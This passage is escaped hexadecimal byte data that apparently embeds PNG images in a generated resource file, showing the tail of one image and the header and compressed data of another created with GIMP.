\x96\\x7d\\x76\\\n\\x94\\x1b\\xf4\\x72\\x08\\x69\\xe1\\xf5\\x7a\\xe1\\xa9\\x1d\\xe2\\xb7\\x66\\x9b\\\n\\x47\\x05\\xa4\\x2c\\x44\\x43\\xa4\\xba\\xba\\x1a\\xe6\\x9f\\x6c\\x22\\x11\\xc0\\\n\\x73\\x8b\\xd7\\x90\\x6b\\xd0\\xcb\\x21\\x14\\x04\\x25\\x21\\x1b\\xd3\\x10\\x69\\\n\\x6c\\x6c\\x24\\xd3\\x21\\xdb\\x6d\\x59\\x8a\\xfa\\xfa\\x15\\x87\\x50\\x41\\x84\\\n\\x42\\x21\\x12\\x42\\xf6\\xa2\\x6b\\x7b\\x50\\x85\\x6c\\xa7\\xd3\\x49\\x46\\xc8\\\n\\x6e\\x9a\\x3a\\x1f\\x75\\xb5\\xe7\\x10\\x2a\\x88\\x70\\x38\\x0c\\xc3\\x47\\x8c\\\n\\x12\\x7e\\x47\\x60\\xee\\xc5\\x3f\\xa3\\x2a\\x5a\\x1e\\x8f\\x87\\x4c\\x87\\xec\\\n\\x2d\\x86\\x17\\x7b\\x94\\x0f\\x7a\\x3b\\xb0\\x31\\xf3\\x4f\\x5c\\xef\\x1a\\xe6\\\n\\x35\\x55\\x09\\xfd\\x62\\x9e\\x3b\\x5b\\x83\\x6a\\x88\\xf8\\x7c\\x3e\\x48\\x2e\\\n\\x9d\\xcd\\x3e\\x28\\x87\\x90\\x1e\\x14\\x84\\x6c\\xfd\\xfb\\x4b\\x50\\x4f\\x90\\\n\\xa5\\xd4\\x21\\xbb\\xa7\\xfa\\xa0\\xb7\\x03\\x1b\\x33\\x37\\x61\\x36\\x9b\\x85\\\n\\x07\\xb0\\xff\\xe9\\x03\\x6f\\x62\\xb6\\xa8\\xef\\xec\\xec\\x24\\x13\\xc0\\x19\\\n\\xdf\\x0e\\x90\\xf6\\x6e\\xdf\\x10\\xf3\\xf3\\x8e\\x57\\xc2\\xef\\xb1\\xd9\\x6c\\\n\\xf0\\xba\\x6a\\x6a\\x8f\\x6e\\xd0\\x1b\\x0e\\x87\\xe1\\x48\\xd6\\xb8\\xf5\\xa3\\\n\\xd5\\x7d\\x5f\\x12\\x5d\\x67\\xf6\\x5f\\xe3\\x50\\xcf\\xc3\\xe0\\x10\\x2a\\x8c\\\n\\xf2\\xf2\\x72\\xf8\\x7d\\x67\\x86\\xf0\\x2f\\xc2\\x5f\\x30\\x1c\\xf5\\x01\\x75\\\n\\x7a\\x7a\\x3a\\xec\\x1f\\x74\\xaf\\xf0\\x3a\\x67\\x36\\x9f\\x4f\\xda\\x71\\xf6\\\n\\xd3\\x50\\x4f\\xd7\\xd1\\x6e\\x95\\x98\\xbf\\x3b\\x5a\\x57\\x57\\x47\\x22\\x80\\\n\\x6d\\xb3\\x1e\\x44\\x0d\\x60\\x76\\x76\\x36\\x89\\x00\\x02\\x00\\xbc\\xdd\\x76\\\n\\x86\\x03\\xc8\\x21\\x8c\\xd2\\xd8\\xd8\\x08\\xf3\\x3e\\x7e\\xac\\xc7\\x37\\xe8\\\n\\xcd\\xcf\\xcf\\x87\\x4d\\xbd\\xbf\\x24\\xe3\\x83\\x26\\x26\\x26\\x72\\xf2\\x38\\\n\\x84\\xd1\\x87\\xd4\\xd3\\x8f\\x0e\\x20\\xe1\\x83\\x62\\x1a\\x22\\x45\\x45\\x45\\\n\\x50\\xf1\\xd5\\x69\\xf6\\x41\\x39\\x84\\xb4\\xf0\\x78\\x3c\\xf0\\xcc\\x3e\\xe8\\\n\\xf1\\x3e\\x68\\x65\\x65\\x25\\x94\\x76\\x1c\\x66\\x1f\\x94\\x43\\x48\\x0b\\xbf\\\n\\xdf\\x0f\\xe9\\x0d\\x21\\xe1\\x13\\xf3\\xd5\\xe4\\x8f\\x50\\x0d\\x11\\xbb\\xdd\\\n\\x0e\\x16\\xf7\\x76\\x12\\x01\\x6c\\x79\\xb9\\x3c\\xe6\\x7c\\x50\\x0e\\xe1\\xff\\\n\\x41\\x20\\x10\\x20\\xe3\\x83\\x96\\x94\\x94\\xa0\\x5e\\xeb\\x66\\xed\\x5c\\x47\\\n\\x22\\x80\\xfb\\xa7\\x2f\\x44\\x6d\\xc7\\xdf\\x13\\x88\\x99\\x87\\xf5\\x5d\\x5d\\\n\\x5d\\x90\\x52\\x7d\\x46\\xfc\\xed\\xf9\\x2f\\x36\\x49\\xab\\xed\\x76\\xb4\\xf1\\\n\\xdd\\x6e\\x37\\x19\\x21\\xbb\\x3e\\x63\\xba\\xb4\\x18\\xb1\\x1d\\x3f\\xaf\\x84\\\n\\x0a\\xe2\\xba\\x0f\\x2a\\x9a\\xcc\\xb6\\x55\\x92\\x1d\\x31\\x80\\x5e\\xaf\\x17\\\n\\x86\\x56\\x2e\\x22\\xe3\\x83\\x2e\\x5e\\xbc\\x98\\x13\\x76\\x0b\\xc4\\xc4\\xc3\\\n\\x7a\\x83\\xc1\\x00\\x47\\xc6\\xaf\\xe8\\xd1\\x3e\\x28\\xa5\\x06\\xbd\\xec\\x83\\\n\\x72\\x08\\x7f\\x40\\x76\\x76\\x36\\xbc\\x33\\x6c\\xa1\\xd0\\x22\\x1f\\xb0\\xcf\\\n\\x4e\\xfa\\xdc\\xff\\x3f\\x21\\xac\\x8e\\x61\\xc1\\x60\\x10\\x7a\\xfd\\xfa\\x79\\\n\\x12\\x3f\\x64\\x4f\\xee\\x0f\\xca\\xdb\\xd1\\x3b\\xc0\\x66\\xb3\\x09\\x0f\\x20\\\n\\x00\\x80\\xf7\\xd4\\x49\\xb4\\x00\\x86\\xc3\\x61\\xc0\\xec\\x3b\\x73\\x5b\\xdb\\\n\\xed\\x8e\\xab\\x1c\\xc0\\x3b\\xa0\\xc7\\xde\\x98\\x29\\x2b\\x2b\\x23\\x21\\x64\\\n\\xfb\\x0b\\x86\\xa3\\xf6\\x07\\x35\\x18\\x0c\\x24\\x1a\\xf4\\x5e\\xef\\x0f\\xca\\\n\\xf0\\x4a\\x08\\x00\\x74\\x1a\\xf4\\x62\\xfb\\xa0\\x26\\x93\\x89\\x8c\\x0f\\xea\\\n\\xf5\\x7a\\x81\\x7d\\x50\\x0e\\x21\\x00\\xd0\\x69\\xd0\\xdb\\x1d\\x3e\\xe8\\xd6\\\n\\x7e\\x5f\\x93\\x39\\x2f\\x9e\\x7d\\x50\\x0e\\x21\\x00\\xd0\\x69\\xd0\\x1b\\x6b\\\n\\x3e\\xa8\\x92\\xcf\\x8b\\xe7\\x10\\xde\\x45\\x3c\\x1e\\x0f\\x89\\x06\\xbd\\xdd\\\n\\xd1\\x1f\\x94\\x7d\\x50\\x0e\\x21\\x39\\xbc\\x5e\\x2f\\x09\\x1f\\x14\\xbb\\x3f\\\n\\x68\\x43\\x43\\x03\\xf7\\x07\\xe5\\x10\\xd2\\x23\\x10\\x08\\x90\\x68\\xd0\\xbb\\\n\\xf0\\xea\\x3b\\xe8\\xfd\\x41\\x33\\xb7\\xd7\\x90\\x08\\xe0\\xce\\xac\\x97\\x62\\\n\\xb2\\x3f\\x28\\x16\\x8a\\x7e\\x44\\x11\\x0a\\x85\\x48\\xf8\\xa0\\x73\\x2f\\xfe\\\n\\x59\\xaa\\x42\\x34\\x44\\x28\\xf5\\x07\\xad\\xcf\\x98\\x2e\\x2d\\xb6\\x58\\x38\\\n\\x39\\xbc\\x12\\xd2\\x69\\xd0\\x9b\\xd9\\xb6\\x0a\\x55\\xd1\\xf2\\xf9\\x7c\\x30\\\n\\x68\\xe5\\x02\\xf6\\x41\\x7b\\x30\\x8a\\xd4\\xd6\\xa8\\x34\\xe8\\xd5\\xbf\\xbf\\\n\\x44\\x3a\\x76\\xec\\x18\\xc4\\x82\\x8e\\xb6\\xb0\\xcf\\xe3\\xa8\\xf2\\x39\\x87\\\n\\x50\\x61\\x98\\x4c\\x26\\xd8\\x9f\\x5a\\x2c\\xdc\\x07\\xed\\xf8\\xef\\x4f\\xd0\\\n\\x1a\\x16\\x75\\x75\\x75\\x41\\x78\\x96\\x91\\x7d\\x50\\xde\\x8e\\xd2\\xc3\\x6c\\\n\\x36\\x0b\\x0f\\x20\\x00\\xc0\\x99\\xf6\\x53\\xa8\\x1d\\xc3\\x9e\\x7c\\xf2\\x49\\\n\\x12\\xdf\\xf7\\x24\\xdf\\x25\\x0e\\x20\\x32\\x8a\\xba\\x31\\x63\\xb3\\xd9\\xe0\\\n\\xad\\x87\\xe6\\x90\\x38\\x2f\\x1e\\xf3\\x04\\x59\\x2a\\xe7\\xc5\\xcf\\x6c\\x3e\\\n\\x9f\\x74\\xb4\\xfd\\x63\\x4e\\x09\\xaf\\x84\\x51\\x2a\\x2a\\x2a\\x48\\x08\\xd9\\\n\\xb1\\x74\\x5e\\xfc\\xd6\\x16\\x6f\\x28\\x21\\x21\\x81\\x53\\xc2\\x21\\x04\\xa8\\\n\\xaf\\xaf\\x87\\xdf\\x06\\xc7\\xf6\\x78\\x1f\\xb4\\xa8\\xa8\\x88\\xcc\\x79\\xf1\\\n\\x5d\\xd5\\xdb\\x62\\xe2\\xbc\\x78\\x0e\\xe1\\x2d\\xd0\\xd4\\xd4\\x04\\xbf\\x3a\\\n\\xf3\\x48\\x8f\\xf7\\x41\\x29\\xe9\\x68\\x81\\xe5\\x75\\xec\\x83\\x72\\x08\\xa3\\\n\\xb8\\x5c\\xae\\x98\\xf0\\x41\\xed\\x76\\x3b\\x19\\x1d\\xed\\xdc\\xe2\\x35\\xa8\\\n\\xab\\x3d\\xa3\\xa0\\x10\\x7a\\xbd\\x5e\\x98\\xb0\\xeb\\x72\\x8f\\xf7\\x41\\x9d\\\n\\x4e\\x27\\x99\\xf6\\x84\\xdc\\x1f\\x94\\x43\\xf8\\x0f\\xfc\\x7e\\x3f\\x09\\x1f\\\n\\x74\\x45\\xff\\x23\\xa8\\x3e\\x28\\x25\\x1d\\x8d\\xfb\\x83\\x72\\x08\\xff\\x41\\\n\\x30\\x18\\x24\\xd1\\xa0\\xf7\\x37\\xe1\\x9d\\xd2\\xb2\\x65\\xcb\\xd0\\xc6\\xa7\\\n\\xa4\\xa3\\x6d\\x31\\xbc\\x28\\xe5\\x71\\x7f\\x50\\x0e\\x21\\x40\\xd4\\x07\\x1d\\\n\\x3c\\x7b\\xf5\\x7a\\xd1\\x9f\\xe3\\xb9\\xb3\\x35\\x52\\x6d\\x6d\\x2d\\xea\\x3f\\\n\\x34\\x54\\xce\\x8b\\x5f\\x9b\\x36\\x05\\x75\\xb5\\x67\\x14\\x14\\xc2\\x48\\x24\\\n\\x02\\x06\\x83\\x01\\xbe\\x19\\xf9\\x8c\\xd0\\x53\\x64\\x7f\\xf6\\xd1\\x4a\\x54\\\n\\x43\\xa4\\xab\\xab\\x0b\\xda\\x5e\\x7c\\x7a\\x3d\\x85\\xef\\xbc\\xec\\xe1\\x27\\\n\\x51\\x57\\x7b\\xe6\\xd6\\x20\\xe3\\x8e\\x52\\xf0\\x41\\x87\\xec\\x9c\\x2f\\xb5\\\n\\xb7\\xb7\\xa3\\x09\\xd9\\x00\\x00\\xa9\\xa9\\xa9\\x24\\x6c\\x18\\x16\\xb2\\xe9\\\n\\x40\\x42\\x5b\\xa3\\xe2\\x83\\xb6\\xb4\\xb4\\xa0\\x06\\xd0\\x64\\x32\\x91\\x08\\\n\\xe0\\x0b\\xa1\\x04\\xc9\\xb9\\x9d\\x03\\xc8\\x21\\xfc\\x9e\\xa2\\xa2\\x22\\x12\\\n\\x3e\\xe8\\x85\\x92\\x34\\x09\\x53\\xd1\\xa2\\xd2\\x1d\\x2d\\xb3\\xe3\\xaa\\x74\\\n\\xec\\xd8\\x7e\\x9e\\xf9\\x1c\\xc2\\x28\\x15\\x15\\x15\\xb0\\xa6\\xd7\\xb3\\x24\\\n\\x84\\x6c\\xcc\\x06\\xbd\\x54\\xba\\xa3\\x5d\\x6f\\xd0\\x8b\\xb9\\xda\\x33\\xb7\\\n\\x8f\\xb0\\x1b\\x33\\x54\\x7c\\x50\\x6c\\x21\\x9b\\x92\\x8e\\xd6\\xda\\xda\\xca\\\n\\x0d\\x7a\\x39\\x84\\x51\\xa8\\xf8\\xa0\\x87\\xb2\\xe3\\x51\\x15\\xad\\xc6\\xc6\\\n\\x46\\x32\\x3a\\x5a\\xb8\\xd6\\xc1\\x42\\x36\\x87\\x30\\x8a\\xdb\\xed\\x26\\xe1\\\n\\x83\\xee\\x9e\\x18\\x96\\x0c\\x06\\x03\\xda\\xf8\\x4e\\xa7\\x93\\xcc\\x61\\x9d\\\n\\xc1\\x95\\x9b\\x51\\xdb\\xf1\\x33\\x0a\\x0a\\xa1\\xd7\\xeb\\x85\\xa7\\x76\\x74\\\n\\xf5\\x78\\x21\\xdb\\xeb\\xf5\\x92\\xd1\\xd1\\x3a\\x4a\\xd7\\x72\\x83\\x5e\\x0e\\\n\\x61\\x14\\x2a\\x3e\\x28\\xb6\\x90\\xed\\xf7\\xfb\\x41\\xb3\\xdc\\x4a\\x46\\xc8\\\n\\xa6\\x72\\x6c\\x1a\\x23\\x38\\x84\\xa1\\x50\\x88\\x84\\x0f\\xba\\xe8\\xda\\x1e\\\n\\x54\\x45\\xab\\xb3\\xb3\\x93\\xcc\\x69\\xb9\\x1f\\xce\\x28\\x66\\x21\\x9b\\x43\\\n\\xf8\\xfd\\x0d\\x81\\x70\\x18\\x06\\xfe\\xc1\\x43\\x42\\xc8\\x5e\\xbd\\x7a\\x35\\\n\\xda\\xf8\\x91\\x48\\x04\\x5e\\x4c\\x1d\\x4e\\xe2\\xce\\x47\\xd3\\xd4\\xf9\\x52\\\n\\x4e\\x4e\\x0e\\xcf\\x6e\\x0e\\x61\\x14\\xcc\\x9b\\x1f\\xb7\\xca\\xcc\\x2f\\x36\\\n\\xa1\\x0a\\xd9\\x00\\x00\\x99\\x99\\x99\\xf0\\x56\\xfa\\x23\\x17\\x45\\xd7\\xba\\\n\\x61\\xdc\\x34\\xd4\\xed\\x36\\xa3\\xb0\\x10\\x9a\\x4c\\x26\\xf0\\x3c\\xfd\\x9a\\\n\\xd0\\x55\\x70\\x45\\xff\\x23\\xe8\\x8e\\x64\\x6e\\x6e\\x2e\\x89\\xe6\\x4c\\x5b\\\n\\x0c\\x2f\\x4a\\x25\\x25\\x25\\x3c\\xab\\x15\\x06\\x9a\\xc0\\x6d\\x36\\x9b\\x85\\\n\\xeb\\x68\\x07\\x26\\x03\\xfa\\x75\\x51\\x51\\x51\\x11\\x89\\x87\\xf1\\x2d\\x2f\\\n\\x97\\xf3\\x35\\x20\\xaf\\x84\\x3f\\x9c\\x98\\xa2\\x02\\xf8\\x80\\x7d\\x76\\xd2\\\n\\x9f\\x86\\x9f\\x97\\xae\\x55\\x18\\xd1\\x27\\x65\\x65\\x65\\xa5\\xf0\\x00\\xae\\\n\\x1c\\xf4\\x94\\xa4\\xda\\xe2\\xe4\\x00\\xf2\\x4a\\x78\\x83\\xb2\\xb2\\xb2\\x6e\\\n\\x3f\\x2f\\x3e\\xb3\\x6d\\x95\\x64\\x32\\x99\\x60\\xca\\x94\\x29\\xd0\\x5d\\xcf\\\n\\xc4\\xec\\x76\\xbb\\xb0\\xde\\x30\\x99\\x1d\\x57\\xa5\\x79\\xf3\\xe6\\xc1\\xb4\\\n\\x69\\xd3\\x00\\xd3\\x79\\x65\\x14\\x18\\xc2\\x60\\x30\\x08\\x7b\\xf6\\xec\\x81\\\n\\xbe\\x7d\\xfb\\xfe\\xcb\\xff\\x7e\\xe5\\xca\\x15\\xb8\\x7a\\xf5\\x2a\\x84\\xc3\\\n\\x61\\x00\\x00\\xb8\\x74\\xe9\\x12\\x5c\\xb9\\x72\\x05\\x2e\\x5f\\xbe\\xfc\\x2f\\\n\\xff\\xff\\xf8\\xf8\\x78\\xe8\\xdd\\xbb\\x37\\x0c\\x1c\\x38\\x10\\xfa\\xf6\\xed\\\n\\x0b\\xf1\\xf1\\xf1\\x90\\x94\\x94\\x04\\x03\\x07\\x0e\\x84\\x7e\\xfd\\xfa\\x41\\\n\\xef\\xde\\xbd\\x85\\x4c\\x42\\x97\\xcb\\x05\\x23\\xaa\\x8b\\xe5\\x99\\xcd\\xe7\\\n\\x93\\x00\\x00\\x8a\\x07\\x0f\\x7c\\x75\\xb4\\xba\\xef\\x8f\\x7e\\x19\\x79\\xf4\\\n\\xf1\\xcf\\xa5\\x3e\\x7d\\xfa\\x40\\xff\\xfe\\xfd\\x61\\xc0\\x80\\x01\\xa0\\xd1\\\n\\x68\\x20\\x3e\\x3e\\x1e\\xee\\xbb\\xef\\x3e\\x18\\x39\\x72\\x24\\x0c\\x19\\x32\\\n\\x04\\x46\\x8e\\x1c\\x09\\xac\\x9f\\x71\\x08\\x19\\x86\\xa1\\x7e\\x4d\\xc8\\x30\\\n\\x0c\\x87\\x90\\x61\\x38\\x84\\x0c\\xc3\\x70\\x08\\x19\\x86\\x43\\xc8\\x30\\x0c\\\n\\x87\\x90\\x61\\x38\\x84\\x0c\\xc3\\x70\\x08\\x19\\x86\\x43\\xc8\\x30\\x0c\\x87\\\n\\x90\\x61\\xc8\\xf2\\xbf\\x2a\\x3b\\xdf\\xcc\\xe1\\x06\\x19\\x07\\x00\\x00\\x00\\\n\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x25\\xb5\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\xe1\\x00\\x00\\x00\\xe1\\x08\\x06\\x00\\x00\\x00\\x3e\\xb3\\xd2\\x7a\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x2e\\x23\\x00\\x00\\\n\\x2e\\x23\\x01\\x78\\xa5\\x3f\\x76\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe3\\x07\\x13\\x10\\x3a\\x0b\\x02\\xd5\\x43\\x6c\\x00\\x00\\x00\\x19\\x74\\x45\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\\n\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x57\\x81\\x0e\\x17\\x00\\\n\\x00\\x20\\x00\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x9d\\x7b\\x74\\x14\\x55\\xbe\\\n\\xef\\xbf\\xbb\\x2a\\x9d\\x47\\x87\\x57\\x92\\x06\\x35\\x06\\x06\\x64\\x04\\x1f\\\n\\x3c\\x23\\x22\\x81\\x06\\x9c\\xc9\\x99\\x10\\x8d\\xa0\\xf2\\x50\\x96\\x9e\\xa0\\\n\\x71\\xc2\\x79\\xe0\\x59\\x11\\x35\\xe0\\x1c\\x16\\xde\\xc1\\x05\\xd7\\x73\\x27\\\n\\x3c\\x8c\\xdc\\x91\\x99\\x73\\x51\\x19\\x27\\x47\\x0e\\x1a\\xc0\\x01\\xcc\\x28\\\n\\x91\\x78\\x24\\x04\\x02\\x0c\\x13\\x40\\x22\\x22\\x1e\\x90\\xc1\\x98\\xa3\\xd0\\\n\\x24\\xbc\\xd2\\x74\\xd2\\xa9\\xda\\xf7\\x8f\\xee\\x8e\\x1d\\xd2\\x09\\x9d\\x74\\\n\\x55\\xed\\x5d\\xd5\\xfb\\xbb\\x56\\x96\\x4b\\x68\\xaa\\x6a\\xa7\\xf7\\xa7\\x7e\\\n\\xfb\\xf1\\xdd\\xbf\\x1f\\xa1\\x94\\x42\\x48\\x48\\x88\\x9d\\x24\\xf1\\x2b\\x10\\\n\\x12\\x12\\x10\\x0a\\x09\\x09\\x08\\x85\\x84\\x84\\x04\\x84\\x42\\x42\\x02\\x42\\\n\\x21\\x21\\x21\\x01\\xa1\\x90\\x90\\x80\\x50\\x48\\x48\\x48\\x40\\x28\\x24\\x14\\\n\\x75\\x8a\\x11\\xbf\\x82\\xe8\\x52\\xc3\\x9c\\x89\\x12\\x28\\x24\\x00\\xa4\\x27\\\n\\xff\\x9e\\x82\\xa2\\x45\\xa5\\xb4\\xa1\\xa5\\x95\\xd6\\x7b\\x14\\x75\\xb0\\x3d\\\n\\x96\\xf4\\xb3\\x49\\x44\\x96\\x24\\x35\\xb9\\x74\\xaf\\x70\\x7e\\xf4\\x40\\x44\\\n\\x38\\x66\\xac\\x06\\x17\\xed\\x0a\\x2e\\x02\\xa0\\x1f\\x80\\x41\\xfe\\xff\\x92\\\n\\xee\\x43\\x08\\xda\\xa2\\xaa\\xcd\\x97\\xbc\\x8a\\xeb\\x62\\x8b\\x72\\xfe\\xe6\\\n\\x78\\x5b\\x4c\\x62\\x8c\\x14\\x2f\\x13\\x72\\x11\\x44\\xba\\x64\\x14\\x88\\x09\\\n\\x8b\\x2b\\xa4\\x56\\x40\\xa2\\x3d\\x7c\\x99\\x74\\x1b\\x14\\x80\\xca\\x80\\xe2\\\n\\x29\\xca\\xa4\\xdc\\x43\\x58\\x52\\x52\\x82\\xa7\\x8e\\xa5\\x32\\xeb\\x8c\\xb7\\\n\\x6f\\x5b\\x80\\xa5\\x4b\\x97\\x22\\x37\\x37\\x57\\xd7\\xfb\\xe4\\xe7\\xe7\\xa3\\\n\\xe8\\xe2\\x17\\x78\\xf2\\xd0\\x59\\xc3\\xdb\\xb8\\x68\\x68\\x0a\\xfe\\x37\\xfa\\\n\\xa3\\x34\\xf9\\x5a\\x00\\x3c\\x29\\x4c\\xb8\\x24\\xff\\x67\\xee\\xf5\\xff\\xb7\\\n\\x27\\x11\\x51\\x6d\\xa5\\xf4\\x8a\\x47\\x51\\xbf\\x56\\x29\\xbe\\x8c\\x93\\x25\\\n\\x77\\x0c\\x41\\x93\\x4c\\xc8\\x71\\x10\\x52\\x97\\x5c\\xba\\x4f\\xd1\\xab\\xdd\\\n\\xf6\\x17\\x3e\\x92\\x5a\\xe5\\x18\\x49\\x21\\x92\\x44\\x23\\x7c\\x99\\x74\\x53\\\n\\x0a\\x80\\x06\\x00\\x7f\\x8b\\x05\\x2e\\x6a\\x0d\\xa2\\xe6\\x10\\x8e\\x1a\\x35\\\n\\x0a\\xb5\\xd9\\xaf\\x31\\x8f\\x0c\\x8f\\x9e\\x5a\\x87\\x2d\\x5b\\xb6\\xe8\\x7a\\\n\\x0f\\xa7\\xd3\\x89\\xed\\x37\\x2b\\xc6\\x37\\x8e\\x10\\x09\\x94\\xca\\x00\\x92\\\n\\xfc\\x1d\\x31\\x19\\xc0\\x4f\\xc2\\x80\\x8b\\x00\\xe8\\x1b\\x61\\xe7\\xa5\\x2a\\\n\\xd0\\xac\\x52\\xfa\\x03\\x80\\x2f\\x25\\x60\\x3f\\x40\\xf6\\x4a\\x04\\xc7\\x40\\\n\\xa4\\x46\\xad\\x23\\x61\\xc2\\xe2\\x0a\\xa9\\x95\\xaa\\x92\\xd4\\xec\\x96\\xd5\\\n\\x18\\x5b\\x92\\x2a\\xdb\\x06\\x52\\x22\\x25\\x85\\xd9\\xde\\x48\\x45\\xfd\\x00\\\n\\xba\\x00\\x54\\x01\\x28\\x8f\\x01\\xce\\xb6\\x14\\x65\\x6a\\xfa\\xa5\\x6b\\x3e\\\n\\x27\\x6c\\x6e\\x6e\\xe6\\x62\\x78\\xf6\\xc1\\xd0\\x05\\x18\\x37\\x6e\\x1c\\x0e\\\n\\x1c\\x38\\x00\\x59\\x96\\x75\\xb9\\xc7\\xee\\xdd\\xbb\\x31\\x76\\xec\\x58\\x7c\\\n\\x36\\x2c\\xd1\\xc8\\xa6\\xc9\\xa0\\x34\\x19\\xc0\\x10\\x00\\x23\\x01\\xdc\\xe7\\\n\\xef\\x90\\xc9\\x61\\xc2\\x45\\xfc\\x9d\\xb6\\xc7\\x8b\\x72\\x12\\x20\\x4b\\x84\\\n\\xd8\\x01\\x5c\\x05\\xf0\\xa5\\xff\\x47\\xf3\\xa1\\x68\\xcc\\xe2\\x0a\\x59\\x05\\\n\\x92\\x41\\xa4\\x9f\\xa8\\xb1\\x76\\x07\\x40\\x07\\x03\\x64\\x1c\\x80\\x81\\xdd\\\n\\x68\\x6f\\xa4\\x11\\xf0\\x3c\\x80\\x3d\\x00\\x7e\\x00\\x70\\x45\\x06\\x54\\xee\\\n\\x87\\xa3\\x6e\\xb7\\x1b\\x77\\xdc\\x71\\x07\\xea\\xe6\\x6e\\xe0\\x02\\xc6\\x89\\\n\\xfb\\x7e\\x8d\\xaa\\xaa\\x2a\\xdd\\xae\\xef\\xf1\\x78\\xe0\\xfe\\xfb\\x9f\\x19\\\n\\x07\\x20\\xe0\\x00\\xe0\\x04\\x30\\x0d\\xc0\\x68\\x00\\x83\\xfd\\x1d\\x51\\x8a\\\n\\x14\\xae\\x6e\\x74\\x4c\\x17\\x80\\x4a\\x00\\xef\\xfb\\x3b\\xa8\\x2b\\x79\\x73\\\n\\xb5\\xa2\\x03\\x80\\x81\\xb6\\x66\\x01\\x18\\x02\\x4a\\x53\\x40\\xc8\\x40\\x7f\\\n\\x34\\xd7\\xbb\\xbd\\x1d\\xda\\x29\\x01\\xae\\x56\\x8d\\xa3\\xa0\\x6e\\x0b\\x33\\\n\\x2e\\x97\\x0b\\x03\\x8a\\x8e\\x72\\xb3\\x68\\xf1\\xd0\\x89\\xd7\\xb1\\x7d\\xfb\\\n\\x76\\xdd\\xae\\xef\\x72\\xb9\\x20\\xfd\\xd3\\x74\\xa3\\x00\\x9c\\x02\\x60\\x8e\\\n\\xbf\\x73\\x3a\\xfc\\x7f\\x6e\\xd4\\x56\\x53\\xa0\\x63\\xee\\xf1\\x77\\xcc\\x4a\\\n\\x9d\\x01\\x0c\\x6e\\x6b\\x8a\\xbf\\x9d\\xb2\\x01\\x73\\x40\\x15\\xc0\\x05\\x7f\\\n\\xfb\\xde\\x03\\x50\\xa9\\x17\\x80\\xd0\\xeb\\xcb\\x73\\x38\\x1c\\x38\\x5b\\x30\\\n\\x9c\\x1b\\x08\\x3f\\xbc\\xe3\\x39\\x5d\\x17\\x6a\\x1c\\x0e\\x07\\xdc\\xc5\\xa5\\\n\\x46\\x02\\x38\\x05\\xc0\\x00\\x00\\x36\\x03\\x01\\xa4\\x00\\x1a\\x29\\xb0\\x8f\\\n\\x02\\xa5\\x06\\x02\\x18\\x68\\x6b\\xac\\x7f\\xfa\\x44\\x0c\\x7a\\xd9\\x7c\\x03\\\n\\x60\\x27\\x80\\x2a\\x3d\\x01\\x84\\x9e\\x5f\\x60\\x5a\\x5a\\x1a\\x3e\\x9f\\x77\\\n\\x13\\x37\\x20\\xbe\\x7b\\xcb\\xd3\\x28\\x2c\\x2c\\x84\\x9e\\xed\\xad\\x5f\\xb6\\\n\\xde\\x28\\x00\\x03\\x11\\xd0\\x48\\xb5\\x52\\xe0\\x8c\\x4a\\x69\\x79\\x8b\\x42\\\n\\xf7\\xb6\\x52\\xc3\\x00\\x34\\xba\\xad\\x81\\x68\\x7f\\x14\\xc0\\x51\\xbd\\x01\\\n\\xd4\\x15\\x42\\x00\\x18\\x31\\x62\\x04\\x2a\\x67\\xc4\\x71\\x03\\xe2\\x1a\\xe9\\\n\\x01\\xac\\x58\\xb1\\x42\\xd7\\xf6\\x7e\\xf5\\xe2\\x1a\\x2b\\x02\\x18\\xe8\\x98\\\n\\x47\\x00\\x1c\\x71\\x2b\\xca\\xf9\\x01\\x5b\\x2c\\x0d\\x60\\x95\\x3f\\x0a\\x7e\\\n\\x63\\xf3\\xfd\\x19\\x4c\\x0b\\x21\\xe0\\x5b\\xc6\\xdf\\x3c\\xe1\\x12\\x37\\x20\\\n\\xfe\\xaf\\xcb\\x19\\x58\\xbf\\x7e\\xbd\\x6e\\xd7\\xcf\\xc8\\xc8\\xc0\\x67\\x4f\\\n\\x2c\\xb2\\x22\\x80\\x55\\x04\\xf8\\x58\\x22\\xe4\\x54\\x2f\\x5b\\x4c\\xab\\x85\\\n\\x01\\xac\\x84\\x6f\\xb8\\x5d\\x25\\x01\\x0d\\xd7\\x8a\\x32\\x55\\xd3\\x43\\x08\\\n\\x00\\x33\\x67\\xce\\xc4\\xbf\\xdf\\x7e\\x9a\\x1b\\x10\\xff\\xf1\\xeb\\xdb\\xb0\\\n\\x69\\xd3\\x26\\x5d\\xdb\\xbb\\x2d\\xe7\\x1f\\xac\\x04\\x60\\x5b\\xc7\\x24\\x40\\\n\\xc3\\x4d\\x5b\\xaa\\x55\\x8b\\x03\\x58\\x69\\xc4\\x30\\xd4\\x50\\x08\\x01\\x60\\\n\\xfe\\xfc\\xf9\\x78\\xa5\\xf7\\x3e\\x6e\\x40\\x7c\\xa2\\xa6\\x3f\\x2a\\x2a\\x2a\\\n\\x74\\xbb\\x7e\\x5e\\x5e\\x1e\\x36\\x64\\xcc\\xb6\\x12\\x80\\x9a\\x2f\\xc4\\x08\\\n\\x00\\x7d\\x32\\xdc\\x3b\\x5a\\x50\\x50\\x80\\xdf\\xc6\\x3f\\xcc\\x0d\\x8c\\x87\\\n\\xe6\\x26\\x21\\x3d\\x3d\\x5d\\xb7\\xeb\\x17\\x16\\x16\\x62\\xc9\\x99\\xbd\\x61\\\n\\x7e\\x1b\\x44\\x02\\xa5\\x29\\xfe\\xce\\xf8\\xb8\\x00\\xd0\\xfa\\x00\\x32\\x81\\\n\\x10\\x00\\x66\\xcd\\x9a\\x85\\x0f\\x86\\x2e\\xe0\\x06\\xc4\\x13\\xf9\\x03\\x31\\\n\\x6c\\xd8\\x30\\xdd\\xae\\x1f\\xf0\\x99\\x86\\x21\\x1b\\x80\